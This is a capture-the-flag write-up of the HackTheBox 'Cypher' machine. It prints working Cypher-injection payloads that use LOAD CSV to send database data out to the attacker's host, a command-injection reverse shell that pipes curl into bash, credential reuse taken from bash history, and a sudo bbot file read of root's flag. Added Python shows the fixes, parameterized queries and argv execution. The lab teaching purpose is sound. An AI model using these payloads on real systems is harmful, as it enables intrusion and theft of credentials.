HackTheBox - Cypher

Cypher exposes a site vulnerable to Cypher Injection, as well as a JAR file in which we discovered a procedure with a Command Injection vulnerability that gave us access as a first user. Credentials in the bash history gave us access to a second user. Finally, we achieved file read and command execution as root through the bbot command.

Name: Cypher
OS: Linux
Points: 30
Difficulty: Medium
Release date: 2025-03-01
IP: 10.10.11.57
Maker: Techromancer


Recon

nmap

nmap shows multiple open ports: http (80) and ssh (22).

# Nmap 7.94SVN scan initiated Sat Mar  1 18:33:01 2025 as: nmap -p22,80 -sV -sC -oN nmap_scan 10.10.11.57
Nmap scan report for 10.10.11.57
Host is up (0.067s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cypher.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  1 18:33:10 2025 -- 1 IP address (1 host up) scanned in 8.70 seconds

Web Site

The website redirects us to the domain cypher.htb, which we add to the /etc/hosts file.

❯ curl -sI 10.10.11.57
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 01 Mar 2025 23:35:26 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://cypher.htb/

The site's main page shows a message with a link to a “Demo”.

The link redirects us to a login page.

Directory Brute Forcing

feroxbuster shows several paths, among them the path to an API and a .jar file.

❯ feroxbuster -u http://cypher.htb/ -w $CM
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://cypher.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      179l      477w     4986c http://cypher.htb/about
307      GET        0l        0w        0c http://cypher.htb/demo => http://cypher.htb/login
200      GET      126l      274w     3671c http://cypher.htb/login
200      GET        3l      113w     8123c http://cypher.htb/bootstrap-notify.min.js
200      GET       63l      139w     1548c http://cypher.htb/utils.js
200      GET        7l     1223w    80496c http://cypher.htb/bootstrap.bundle.min.js
200      GET       12l     2173w   195855c http://cypher.htb/bootstrap.min.css
200      GET     7333l    24018w   208204c http://cypher.htb/vivagraph.min.js
200      GET      876l     4886w   373109c http://cypher.htb/logo.png
307      GET        0l        0w        0c http://cypher.htb/api => http://cypher.htb/api/docs
404      GET        1l        2w       22c http://cypher.htb/apis
200      GET        2l     1293w    89664c http://cypher.htb/jquery-3.6.1.min.js
200      GET      162l      360w     4562c http://cypher.htb/
200      GET     5632l    33572w  2776750c http://cypher.htb/us.png
404      GET        1l        2w       22c http://cypher.htb/demo2
404      GET        1l        2w       22c http://cypher.htb/demos
200      GET      162l      360w     4562c http://cypher.htb/index
200      GET      162l      360w     4562c http://cypher.htb/index.html
307      GET        0l        0w        0c http://cypher.htb/api/ => http://cypher.htb/api/api
405      GET        1l        3w       31c http://cypher.htb/api/auth
301      GET        7l       12w      178c http://cypher.htb/testing => http://cypher.htb/testing/
200      GET       17l      139w     9977c http://cypher.htb/testing/custom-apoc-extension-1.0-SNAPSHOT.jar

Custom Procedures - Cypher

In testing/ we find only the file custom-apoc-extension-1.0-SNAPSHOT.jar.

❯ curl -s http://cypher.htb/testing/ | html2text
****** Index of /testing/ ******
===============================================================================
../
custom-apoc-extension-1.0-SNAPSHOT.jar             17-Feb-2025 11:49
6556
===============================================================================

We download the file and open it in jadx-gui. The code defines two procedures for Cypher. The first one takes a name and returns a greeting.

package com.cypher.neo4j.apoc;

import java.util.stream.Stream;
import org.neo4j.procedure.Description;
import org.neo4j.procedure.Mode;
import org.neo4j.procedure.Name;
import org.neo4j.procedure.Procedure;

public class HelloWorldProcedure {

  @Procedure(name = "custom.helloWorld", mode = Mode.READ)
  @Description("A simple hello world procedure")

  public Stream<HelloWorldOutput> helloWorld(@Name("name") String name) {
    String greeting = "Hello, " + name + "!";
    return Stream.of(new HelloWorldOutput(greeting));
  }
  
  public static class HelloWorldOutput {
    public String greeting;
    
    public HelloWorldOutput(String greeting) {
      this.greeting = greeting;
    }
  }
}

The second one builds a curl command using the value of a URL passed as an argument and returns the HTTP response code. This procedure has a Command Injection vulnerability: the url is not “filtered” in any way and is concatenated into the string that /bin/sh -c runs, so it would be possible to inject commands for execution.

package com.cypher.neo4j.apoc;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.concurrent.TimeUnit;
import java.util.stream.Stream;
import org.neo4j.procedure.Description;
import org.neo4j.procedure.Mode;
import org.neo4j.procedure.Name;
import org.neo4j.procedure.Procedure;

public class CustomFunctions {
  @Procedure(name = "custom.getUrlStatusCode", mode = Mode.READ)
  @Description("Returns the HTTP status code for the given URL as a string")

  public Stream<StringOutput> getUrlStatusCode(@Name("url") String url) throws Exception {
    if (!url.toLowerCase().startsWith("http://") && !url.toLowerCase().startsWith("https://"))
      url = "https://" + url; 
    String[] command = { "/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url };
    System.out.println("Command: " + Arrays.toString((Object[])command));
    Process process = Runtime.getRuntime().exec(command);
    BufferedReader inputReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
    BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
    StringBuilder errorOutput = new StringBuilder();
    String line;
    while ((line = errorReader.readLine()) != null)
      errorOutput.append(line).append("\n"); 
    String statusCode = inputReader.readLine();
    System.out.println("Status code: " + statusCode);
    boolean exited = process.waitFor(10L, TimeUnit.SECONDS);
    if (!exited) {
      process.destroyForcibly();
      statusCode = "0";
      System.err.println("Process timed out after 10 seconds");
    } else {
      int exitCode = process.exitValue();
      if (exitCode != 0) {
        statusCode = "0";
        System.err.println("Process exited with code " + exitCode);
      } 
    } 
    if (errorOutput.length() > 0)
      System.err.println("Error output:\n" + errorOutput.toString()); 
    return Stream.of(new StringOutput(statusCode));
  }
  
  public static class StringOutput {
    public String statusCode;
    
    public StringOutput(String statusCode) {
      this.statusCode = statusCode;
    }
  }
}

Cypher injection

When we tamper with the username value in the site's login, it returns an error.

The error shows that Python is used on the backend, and it also shows the Cypher query used to authenticate users.

# POST data json
# {"username":"admin'","password":"admin"}

# Response
HTTP/1.1 400 Bad Request
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 01 Mar 2025 23:46:57 GMT
Content-Length: 3457
Connection: keep-alive

Traceback (most recent call last):
  File "/app/app.py", line 142, in verify_creds
    results = run_cypher(cypher)
  File "/app/app.py", line 63, in run_cypher
    return [r.data() for r in session.run(cypher)]
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/session.py", line 314, in run
    self._auto_result._run(
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/result.py", line 221, in _run
    self._attach()
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/result.py", line 409, in _attach
    self._connection.fetch_message()
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_common.py", line 178, in inner
    func(*args, **kwargs)
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_bolt.py", line 860, in fetch_message
    res = self._process_message(tag, fields)
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_bolt5.py", line 370, in _process_message
    response.on_failure(summary_metadata or {})
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_common.py", line 245, in on_failure
    raise Neo4jError.hydrate(**metadata)
neo4j.exceptions.CypherSyntaxError: {code: Neo.ClientError.Statement.SyntaxError} {message: Failed to parse string literal. The query must contain an even number of non-escaped quotes. (line 1, column 60 (offset: 59))
"MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'admin'' return h.value as hash"
                                                            ^}

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/app/app.py", line 165, in login
    creds_valid = verify_creds(username, password)
  File "/app/app.py", line 151, in verify_creds
    raise ValueError(f"Invalid cypher query: {cypher}: {traceback.format_exc()}")
ValueError: Invalid cypher query: MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'admin'' return h.value as hash: Traceback (most recent call last):
  File "/app/app.py", line 142, in verify_creds
    results = run_cypher(cypher)
  File "/app/app.py", line 63, in run_cypher
    return [r.data() for r in session.run(cypher)]
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/session.py", line 314, in run
    self._auto_result._run(
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/result.py", line 221, in _run
    self._attach()
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/result.py", line 409, in _attach
    self._connection.fetch_message()
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_common.py", line 178, in inner
    func(*args, **kwargs)
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_bolt.py", line 860, in fetch_message
    res = self._process_message(tag, fields)
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_bolt5.py", line 370, in _process_message
    response.on_failure(summary_metadata or {})
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_common.py", line 245, in on_failure
    raise Neo4jError.hydrate(**metadata)
neo4j.exceptions.CypherSyntaxError: {code: Neo.ClientError.Statement.SyntaxError} {message: Failed to parse string literal. The query must contain an even number of non-escaped quotes. (line 1, column 60 (offset: 59))
"MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'admin'' return h.value as hash"
                                                            ^}

The query shows that the username value from the login is used directly in the query.

MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'admin' return h.value as hash
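
The fix for the query above is to send the username as a query parameter instead of splicing it into the query text. The following Python is an added example, not the application's code: build_concat_query, query_skeleton and fetch_hash are hypothetical names, and the quote and comment handling is a simplified model of Cypher's lexer.

```python
"""Added example: string-built vs parameterized Cypher for the login query."""

# Query text taken from the traceback; only the username handling differs.
PARAM_QUERY = (
    "MATCH (u:USER) -[:SECRET]-> (h:SHA1) "
    "WHERE u.name = $username RETURN h.value AS hash"
)


def build_concat_query(username):
    """Pattern visible in the traceback: user input becomes query text."""
    return (
        "MATCH (u:USER) -[:SECRET]-> (h:SHA1) "
        f"WHERE u.name = '{username}' return h.value as hash"
    )


def query_skeleton(query):
    """Replace every string literal with '?' and drop // comments.

    Simplified model of Cypher lexing (hypothetical helper). Two inputs that
    yield different skeletons changed the structure of the query, which is
    what an injection is. Raises ValueError on an unterminated literal, the
    condition Neo4j reported for the username admin'.
    """
    out = []
    i = 0
    while i < len(query):
        ch = query[i]
        if ch in ("'", '"'):
            quote = ch
            i += 1
            while i < len(query) and query[i] != quote:
                i += 2 if query[i] == "\\" else 1  # skip an escaped character
            if i >= len(query):
                raise ValueError("unterminated string literal")
            out.append("?")
            i += 1
        elif query.startswith("//", i):
            end = query.find("\n", i)
            i = len(query) if end == -1 else end
        else:
            out.append(ch)
            i += 1
    return " ".join("".join(out).split())


def fetch_hash(session, username):
    """Parameterized lookup: the query text is constant and the value travels
    separately, so a quote in the username is data and never syntax.

    `session` is a neo4j driver session; run(query, parameters) is its API.
    """
    records = session.run(PARAM_QUERY, {"username": username})
    rows = [r.data() for r in records]
    return rows[0]["hash"] if rows else None
```

Returning a generic error to the client instead of the traceback also removes the query disclosure seen in the response above.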

Injection

As in HTB - OnlyForYou, we enumerate the database. We run an HTTP server to receive the data, although in some cases the site itself returns the values when it shows the error. We see the Neo4j version, 5.24.1.

# VERSION
# ' OR 1=1 WITH 1 as a  CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.238/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

message: Invalid URL 'http://10.10.14.238/?version=5.24.1&name=Neo4j Kernel&edition=community': Illegal character in query at index 46: http://10.10.14.238/?version=5.24.1&name=Neo4j Kernel&edition=community ()}

We find multiple labels, notably USER and SHA1, which are used in the authentication query.

# LABELS
# ' OR 1=1 WITH 1337 AS x CALL db.labels() YIELD label AS d LOAD CSV FROM 'http://10.10.14.238/?'+d AS y RETURN 0 as _0//
10.10.11.57 - - [01/Mar/2025 19:15:16] "GET /?USER HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:16] "GET /?HASH HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:16] "GET /?DNS_NAME HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:17] "GET /?SHA1 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:17] "GET /?SCAN HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:17] "GET /?ORG_STUB HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:17] "GET /?IP_ADDRESS HTTP/1.1" 200 -

We retrieved the values of the labels and found that there is a single user and its hash.

# KEYS 
# ' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.238/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
# USER
10.10.11.57 - - [01/Mar/2025 19:16:14] "GET /?name=graphasm HTTP/1.1" 200 -
# SHA1
10.10.11.57 - - [01/Mar/2025 19:17:12] "GET /?value=9f54ca4c130be6d529a56dee59dc2b2090e43acf HTTP/1.1" 200 -

We find other values whose purpose is unknown.

# HASH <-- empty
# DNS_NAME
message: Invalid input for function 'toString()': Expected a String, Float, Integer, Boolean, Temporal or Duration, got: StringArray[211.255.9.117, 220.187.22.183, 99.13.13.209, 143.2.172.244, 100.136.140.192, 2603:1010:3:3::5b, 2603:1020:201:10::10f, 2603:1030:20e:3::23c, 2603:1030:b:3::152, 2603:1030:c02:8::14] ()
# SCAN
10.10.11.57 - - [01/Mar/2025 19:17:40] "GET /?parent_uuid=d0ba01af-b882-4284-92f4-01412cb123c4 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:40] "GET /?scope_distance=0 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:41] "GET /?uuid=d0ba01af-b882-4284-92f4-01412cb123c4 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:41] "GET /?scan=SCAN:eb3cf8eb641dd2e8005128c2fee4b43e59fd7785 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:41] "GET /?type=SCAN HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:41] "GET /?web_spider_distance=0 HTTP/1.1" 200 -
# ORG_STUB
message: Invalid input for function 'toString()': Expected a String, Float, Integer, Boolean, Temporal or Duration, got: StringArray[Scan vehement_hagrid seeded with DNS_NAME: ecorp.com, speculated ORG_STUB: ecorp] ()
# IP_ADDRESS
message: Invalid input for function 'toString()': Expected a String, Float, Integer, Boolean, Temporal or Duration, got: StringArray[Scan vehement_hagrid seeded with DNS_NAME: ecorp.com, A record for ecorp.com contains IP_ADDRESS: 211.255.9.117] (Failure when processing file '' on line 17 (which is the last row in the file).)
10.10.11.57 - - [01/Mar/2025 19:20:09] "GET /?host=211.255.9.117 HTTP/1.1" 200 -

Command Injection

As we know, there are two procedures, so we try to use them in the injection. We manage to execute the helloWorld() procedure, which returns a greeting.

# graphasm' CALL custom.helloWorld(u.name) YIELD greeting UNWIND greeting as g LOAD CSV FROM 'http://10.10.14.238/?g=' + g as l RETURN 0 as _0 //
message: Invalid URL 'http://10.10.14.238/?g=Hello, graphasm!': Illegal character in query at index 29: http://10.10.14.238/?g=Hello, graphasm! ()}

In the case of getUrlStatusCode(), it returns the HTTP status code of the request to our HTTP server.

# "/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url
# Payload
# graphasm' CALL custom.getUrlStatusCode('http://10.10.14.238') YIELD statusCode UNWIND statusCode as g LOAD CSV FROM 'http://10.10.14.238/?g=' + g as l RETURN 0 as _0 //

# Response
10.10.11.57 - - [03/Mar/2025 03:48:04] "GET / HTTP/1.1" 200 -
10.10.11.57 - - [03/Mar/2025 03:48:04] "GET /?g=200 HTTP/1.1" 200 - # status code 200

We can also execute commands: we see the execution of whoami, and the user is neo4j.

# Payload
# graphasm' CALL custom.getUrlStatusCode('http://10.10.14.238/$(whoami)') YIELD statusCode UNWIND statusCode as g LOAD CSV FROM 'http://10.10.14.238/?g=' + g as l RETURN 0 as _0 //

# Response
10.10.11.57 - - [03/Mar/2025 03:49:26] code 404, message File not found
10.10.11.57 - - [03/Mar/2025 03:49:26] "GET /neo4j HTTP/1.1" 404 -   # output whoami
10.10.11.57 - - [03/Mar/2025 03:49:26] "GET /?g=404 HTTP/1.1" 200 --
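
Why the $(whoami) in the request above was executed, and what removes the problem in custom.getUrlStatusCode: the following Python is an added example, not code from the JAR. It uses a small child process in place of curl (an assumption, so it runs offline) that reports the arguments it actually received; all function names and the example.invalid URLs are constructed.

```python
"""Added example: "/bin/sh -c <string + url>" versus an argument vector."""
import json
import re
import shlex
import subprocess
import sys
from urllib.parse import urlsplit

# Stand-in for curl: prints, as JSON, the exact arguments it was started with.
REPORTER = [sys.executable, "-c", "import sys, json; print(json.dumps(sys.argv[1:]))"]


def add_scheme(url):
    """Same prefix logic as the procedure: default to https://."""
    if not url.lower().startswith(("http://", "https://")):
        url = "https://" + url
    return url


def _run(argv):
    done = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return json.loads(done.stdout)


def args_seen_via_shell(url):
    """The procedure's pattern: the URL is appended to a string for /bin/sh -c,
    so the shell performs substitution and word splitting on it first."""
    command = " ".join(shlex.quote(a) for a in REPORTER) + " " + add_scheme(url)
    return _run(["/bin/sh", "-c", command])


def args_seen_via_argv(url):
    """No shell: the URL is one argv element and reaches the program verbatim."""
    return _run(REPORTER + [add_scheme(url)])


_HOST = re.compile(r"[A-Za-z0-9.-]+")
_PATH = re.compile(r"[A-Za-z0-9._~/%-]*")


def is_plain_http_url(url):
    """Defence in depth, not the fix: '$', '(' and ')' are legal URL characters
    (RFC 3986 sub-delims), so a generic "is this a URL" check would accept
    http://host/$(whoami). This allow-list is deliberately narrower."""
    if any(ord(c) < 0x21 or ord(c) > 0x7E for c in url):
        return False  # whitespace, control characters, non-ASCII
    try:
        parts = urlsplit(url)
        parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    return (
        parts.scheme in ("http", "https")
        and parts.username is None
        and parts.password is None
        and bool(parts.hostname)
        and _HOST.fullmatch(parts.hostname) is not None
        and _PATH.fullmatch(parts.path) is not None
        and parts.query == ""
        and parts.fragment == ""
    )


def args_seen_hardened(url):
    """Validate first, then start the program without a shell."""
    url = add_scheme(url)
    if not is_plain_http_url(url):
        raise ValueError("URL rejected")
    return _run(REPORTER + [url])


if __name__ == "__main__":
    sample = "http://example.invalid/$(echo EXPANDED)"  # constructed input
    print("shell:", args_seen_via_shell(sample))
    print("argv: ", args_seen_via_argv(sample))
```

In the Java procedure the same change means passing curl and each option as separate elements of the String[] given to Runtime.exec, without /bin/sh -c, or replacing curl with an HTTP client.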

User - Neo4j

We run a reverse shell using shells.

# Payload
# graphasm' CALL custom.getUrlStatusCode('`curl 10.10.14.238:8000/10.10.14.238:1338|bash)`') YIELD statusCode UNWIND statusCode as g LOAD CSV FROM 'http://10.10.14.238/?g=' + g as l RETURN 0 as _0 //

In netcat, we receive a shell as neo4j.

❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.238] from cypher.htb [10.10.11.57] 45074
/bin/sh: 0: can't access tty; job control turned off
$ whoami;id
neo4j
uid=110(neo4j) gid=111(neo4j) groups=111(neo4j)
$ cd
$ pwd
/var/lib/neo4j
$

User - graphasm

In the neo4j directory we find a password for neo4j.

$ ls -lah
total 60K
drwxr-xr-x 13 neo4j adm   4.0K Mar  2 00:57 .
drwxr-xr-x 50 root  root  4.0K Feb 17 16:48 ..
-rw-r--r--  1 neo4j neo4j   63 Oct  8 18:07 .bash_history
drwxrwxr-x  3 neo4j adm   4.0K Oct  8 18:07 .cache
drwxr-xr-x  2 neo4j adm   4.0K Aug 16  2024 certificates
drwxr-xr-x  6 neo4j adm   4.0K Mar  2 00:57 data
drwx------  3 neo4j neo4j 4.0K Mar  1 22:57 .gnupg
drwxr-xr-x  2 neo4j adm   4.0K Aug 16  2024 import
drwxr-xr-x  2 neo4j adm   4.0K Feb 17 16:24 labs
drwxr-xr-x  2 neo4j adm   4.0K Aug 16  2024 licenses
drwxr-xr-x  3 neo4j neo4j 4.0K Mar  2 00:57 .local
-rw-r--r--  1 neo4j adm     52 Oct  2 15:55 packaging_info
drwxr-xr-x  2 neo4j adm   4.0K Feb 17 16:24 plugins
drwxr-xr-x  2 neo4j adm   4.0K Feb 17 16:24 products
drwxr-xr-x  2 neo4j adm   4.0K Mar  2 01:01 run
lrwxrwxrwx  1 neo4j adm      9 Oct  8 18:07 .viminfo -> /dev/null
$ cat .bash_history
neo4j-admin dbms set-initial-password cU4btyib.20xtCMCXkBmerhK
$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
graphasm:x:1000:1000:graphasm:/home/graphasm:/bin/bash
neo4j:x:110:111:neo4j,,,:/var/lib/neo4j:/bin/bash
$

We use it with the user graphasm, obtaining an SSH shell and the user.txt flag.

❯ ssh graphasm@cypher.htb
The authenticity of host 'cypher.htb (10.10.11.57)' can't be established.
ED25519 key fingerprint is SHA256:u2MemzvhD6xY6z0eZp5B2G3vFuG+dPBlRFrZ66gaXZw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cypher.htb' (ED25519) to the list of known hosts.
graphasm@cypher.htb's password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Mar  2 01:13:10 AM UTC 2025

  System load:  0.32              Processes:             288
  Usage of /:   73.8% of 8.50GB   Users logged in:       1
  Memory usage: 60%               IPv4 address for eth0: 10.10.11.57
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Mar 2 01:13:11 2025 from 10.10.14.238
graphasm@cypher:~$ whoami;id 
graphasm
uid=1000(graphasm) gid=1000(graphasm) groups=1000(graphasm)
graphasm@cypher:~$ ls
bbot_preset.yml  bbot_scans  user.txt
graphasm@cypher:~$ cat user.txt 
dcf630f09858401686c357e8a559fcae
graphasm@cypher:~$

Privesc

We find that the user graphasm can run bbot as root.

graphasm@cypher:~$ sudo -l -l
Matching Defaults entries for graphasm on cypher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User graphasm may run the following commands on cypher:

Sudoers entry: /etc/sudoers
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
	/usr/local/bin/bbot
graphasm@cypher:~$

Reading Files (target)

We run bbot passing the root.txt flag as the target, and we also specify verbosity. bbot treats the file as a list of targets and shows them in the output of the run, which reveals the file's content.

graphasm@cypher:~$ sudo bbot -y -t /root/root.txt -m httpx --force -v
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Reading targets from file: /root/root.txt
[VERB] Creating events from 1 targets
[VERB] 
[VERB] ### MODULES ENABLED ###
[VERB] 
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | Module     | Type     | Needs API Key   | Description                   | Flags                        | Consumed Events      | Produced Events    |
[VERB] +============+==========+=================+===============================+==============================+======================+====================+
[VERB] | httpx      | scan     | No              | Visit webpages. Many other    | active, cloud-enum, safe,    | OPEN_TCP_PORT, URL,  | HTTP_RESPONSE, URL |
[VERB] |            |          |                 | modules rely on httpx         | social-enum, subdomain-enum, | URL_UNVERIFIED       |                    |
[VERB] |            |          |                 |                               | web-basic                    |                      |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | csv        | output   | No              | Output to CSV                 |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | json       | output   | No              | Output to Newline-Delimited   |                              | *                    |                    |
[VERB] |            |          |                 | JSON (NDJSON)                 |                              |                      |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | python     | output   | No              | Output via Python API         |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | stdout     | output   | No              | Output to text                |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | txt        | output   | No              | Output to text                |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | cloudcheck | internal | No              | Tag events by cloud provider, |                              | *                    |                    |
[VERB] |            |          |                 | identify cloud resources like |                              |                      |                    |
[VERB] |            |          |                 | storage buckets               |                              |                      |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | dnsresolve | internal | No              |                               |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | aggregate  | internal | No              | Summarize statistics at the   | passive, safe                |                      |                    |
[VERB] |            |          |                 | end of a scan                 |                              |                      |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | excavate   | internal | No              | Passively extract juicy       | passive                      | HTTP_RESPONSE,       | URL_UNVERIFIED,    |
[VERB] |            |          |                 | tidbits from scan data        |                              | RAW_TEXT             | WEB_PARAMETER      |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | speculate  | internal | No              | Derive certain event types    | passive                      | AZURE_TENANT,        | DNS_NAME, FINDING, |
[VERB] |            |          |                 | from others by common sense   |                              | DNS_NAME,            | IP_ADDRESS,        |
[VERB] |            |          |                 |                               |                              | DNS_NAME_UNRESOLVED, | OPEN_TCP_PORT,     |
[VERB] |            |          |                 |                               |                              | HTTP_RESPONSE,       | ORG_STUB           |
[VERB] |            |          |                 |                               |                              | IP_ADDRESS,          |                    |
[VERB] |            |          |                 |                               |                              | IP_RANGE, SOCIAL,    |                    |
[VERB] |            |          |                 |                               |                              | STORAGE_BUCKET, URL, |                    |
[VERB] |            |          |                 |                               |                              | URL_UNVERIFIED,      |                    |
[VERB] |            |          |                 |                               |                              | USERNAME             |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] Loading word cloud from /root/.bbot/scans/questionable_joyce/wordcloud.tsv
[INFO] Scan with 1 modules seeded with 1 targets (1 in whitelist)
[INFO] Installing module dependencies. Please be patient, this may take a while.
[VERB] Installing dependencies for module "httpx"
[INFO] Running 1 Ansible tasks for httpx
[WARN] Failed to run Ansible tasks for httpx
[WARN] Setup failed for module "httpx"
[ERRR] Failed to install dependencies for 1 modules: httpx
[VERB] Loading 0 scan modules: 
[VERB] Loading 5 internal modules: aggregate,cloudcheck,dnsresolve,excavate,speculate
[VERB] Loaded module "aggregate"
[VERB] Loaded module "cloudcheck"
[VERB] Loaded module "dnsresolve"
[VERB] Loaded module "excavate"
[VERB] Loaded module "speculate"
[INFO] Loaded 5/5 internal modules (aggregate,cloudcheck,dnsresolve,excavate,speculate)
[VERB] Loading 5 output modules: csv,json,python,stdout,txt
[VERB] Loaded module "csv"
[VERB] Loaded module "json"
[VERB] Loaded module "python"
[VERB] Loaded module "stdout"
[VERB] Loaded module "txt"
[INFO] Loaded 5/5 output modules, (csv,json,python,stdout,txt)
[VERB] Setting up modules
[INFO] internal.excavate: Compiling 11 YARA rules
[INFO] internal.speculate: No portscanner enabled. Assuming open ports: 80, 443
[SUCC] Setup succeeded for 12/12 modules.
[SUCC] Starting scan questionable_joyce
[VERB] Starting module worker loops
[VERB] 12 modules started
[VERB] _scan_ingress: Target: SCAN("{'id': 'SCAN:2a008a5e1eacbc6b81c464cf7b28674272c487d6', 'name': 'questionable_jo...", module=TARGET, tags={'in-scope', 'target'})
